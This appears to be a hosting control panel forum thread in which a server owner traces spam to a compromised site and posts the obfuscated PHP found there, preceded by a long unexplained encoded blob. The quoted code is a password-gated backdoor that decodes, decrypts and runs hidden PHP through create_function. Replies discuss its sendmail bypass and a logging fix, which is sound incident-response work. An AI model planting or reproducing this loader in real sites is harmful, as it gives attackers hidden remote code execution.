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
Title: Re: My server is sending SPAM but source cannot be tracked !
Post by: MRatWork on 2014-12-15, 14:09:48
try change 'eval' to 'print("<pre">"); print' and execute with 'lxphp.exe file.php' to know the content.
Title: Re: My server is sending SPAM but source cannot be tracked !
Post by: Spacedust on 2014-12-16, 07:00:45
try change 'eval' to 'print("<pre">"); print' and execute with 'lxphp.exe file.php' to know the content.

Got it:

http://pastebin.com/mX6wfUB4

What about this:

Quote
<?php $wp__wp='base'.(32*2).'_de'.'code';$wp__wp=$wp__wp(str_replace("\n", '', 'Ea9EskFq5kqQdI3ShZxXjiTXgocFwxGBFqjWPKKaFAYCVdtMf4GZI1MBfxpqll488V7Tbm3phDbBFAwG
k5MLq6NbLAXb69v3jtw65S0KD5Nx2R8ROgea8Z0z1b/1amqjjy706S1+QQ2+nJYjdf8QYi0ic4kArurt
yE+zVXve7+PByfRZYTFOL7f+0YwcE/+JilFvFyJjOuid8BGS2mlNGOQfnhKnE5hx6rqcKCtrfk29fJNM
s+r1ppMJoVjBbstGuXjMHXYCPlD90sncCTKs/zartN4bBWXeSWp585mZc+OeYVL5mJcPxJn673e62z+y
rROT7OcGEMyd7LCDyMB41OwG6Q5VDAv0wZNelA+Yz0JiYd4nahYoWC/35syZlXQr136ftUc+8gR9xfQW
gG1d2mOxcozGxZbuM9mB80UyYxmXnRDBocwKeR8uTPTiAEXWocDxXLwuCrfhkLZuAvHG2b857X8uqx68
nS8+XSMFquYb6spb8irAgyok1aiuSz3nmyPff5UDylWSWWeTUbLr8xPveohXx7QILM3FCo2edgMoqPO3
5HnO/u84gUkjaqAMe6tTuYCC/j3PJBtTRhJOVu1OdggENrsGE+TQDQD4xMBzQGgQ8spq7eco/eHwA+1u
jxPGRdWIdJm6I+wztPkIqaww4yTTaGVaKSfNmr3IWyieEoTHRQKu4QH6dpA6hFRe3CUQ6h/DVTW/RsCO
z9mftdPzgNEFFCpYtwj5ipGp5Dx1vJ/wiW6gI8sDnu1883J1QX6NAtyZwIQTsfbmEefEljH3OPo0ACDm
jcs/7+lOkA3eU++B36iWChNJl5rsMW9uHVdUUQncubjPMyxgHDN8H3cIFQZm9cKusRdLXHqXVfQQmp5M
Adt741oT7VAGpt3uYbKhwCJOPJI7CXnE/J1HwE7E5j4j5VElqtm691zQFKwb/7lzM0Mb3TjjXp53t7wM
V86KfMxy/JAr99frndIaB+qK3vwI6VzS/N6hvoRYOm5U6UqNbWg9mZgWqQeW4WIi9uNVpqIomUAg3VGm
6FZUaEhcgkyA+XGBu6n95t00TWrZ/LiYfrfvnUcv3KY5zqG2LRzYitWnzV923jubv0eSNWVe97wNCFZj

etc.

and it's ending with:

Quote
'));$wp_wp=isset($_POST['wp_wp'])?$_POST['wp_wp']:(isset($_COOKIE['wp_wp'])?$_COOKIE['wp_wp']:NULL);if($wp_wp!==NULL){$wp_wp=md5($wp_wp).substr(md5(strrev($wp_wp)),0,strlen($wp_wp));for($wp___wp=0;$wp___wp<15185;$wp___wp++){$wp__wp[$wp___wp]=chr(( ord($wp__wp[$wp___wp])-ord($wp_wp[$wp___wp]))%256);$wp_wp.=$wp__wp[$wp___wp];}if($wp__wp=@gzinflate($wp__wp)){if(isset($_POST['wp_wp']))@setcookie('wp_wp', $_POST['wp_wp']);$wp___wp=create_function('',$wp__wp);unset($wp__wp,$wp_wp);$wp___wp();}}?><form action="" method="post"><input type="text" name="wp_wp" value=""/><input type="submit" value="&gt;"/></form>
Title: Re: My server is sending SPAM but source cannot be tracked !
Post by: MRatWork on 2014-12-16, 07:15:20
It's just convert with 'base64_decode'.

Title: Re: My server is sending SPAM but source cannot be tracked !
Post by: chrisf on 2014-12-17, 22:42:25
ah!  The script you decoded checks for qmail and skips our sendmail protection.  (Sendmail limits)  I will have a fix for that over the weekend and I enhanced the code a bit more.

I knew from the start I should have just changed the sendmail in var/qmail!  AHHHH!

Will be fixed!
Title: Re: My server is sending SPAM but source cannot be tracked !
Post by: Spacedust on 2014-12-18, 05:46:38
Thanks chris ! It's really urgent, because we are still sending tons of spam which cannot be tracked !

Mustafa should integrate your script into Kloxo-MR. Last updates required me to reinstall it.
Title: Re: My server is sending SPAM but source cannot be tracked !
Post by: MRatWork on 2014-12-18, 05:55:15
Latest qmail implementing sendmail-wrapper where every sendmail (usually by php mail() function).

At this moment still little bug but every sendmail will be report in maillog something like:
Code: [Select]
...
Dec 18 05:47:24 oln1 logger: sendmail: CALLER="php-fpm: pool devel " PWD="/home/devel/forum.mratwork.com"
...
Title: Re: My server is sending SPAM but source cannot be tracked !
Post by: Spacedust on 2014-12-18, 06:13:50
Latest qmail implementing sendmail-wrapper where every sendmail (usually by php mail() function).

At this moment still little bug but every sendmail will be report in maillog something like:
Code: [Select]
...
Dec 18 05:47:24 oln1 logger: sendmail: CALLER="php-fpm: pool devel " PWD="/home/devel/forum.mratwork.com"
...

Mustafa - you should make additional log file for this - it's very hard to find this around millions of e-mails.
Title: Re: My server is sending SPAM but source cannot be tracked !
Post by: MRatWork on 2014-12-18, 06:18:48
Try 'cat /var/log/maillog|grep sendmail' in 'Command Center'.